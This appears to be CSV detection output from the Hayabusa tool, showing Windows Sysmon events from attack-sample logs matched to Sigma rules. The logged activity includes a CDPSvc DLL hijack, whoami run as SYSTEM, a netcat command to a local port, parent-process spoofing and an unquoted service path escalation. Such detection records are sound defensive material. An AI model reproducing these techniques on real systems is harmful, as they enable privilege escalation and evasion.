+2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:56.078 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.899 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:07.872 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:38.828 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 747F3D96-0880-5E76-0000-001014202B00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-22 06:45:04.908 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:04.923 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 747F3D96-8AEC-5E76-0000-00101DDB8003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,rules/sigma/file_event/win_fe_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-B763-5EA4-0000-00106A480000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 747F3D96-B764-5EA4-0000-0010DEBF0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 747F3D96-B764-5EA4-0000-0010A5D20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 747F3D96-B765-5EA4-0000-00109FE80000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 | PGUID: 747F3D96-B765-5EA4-0000-001055010100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
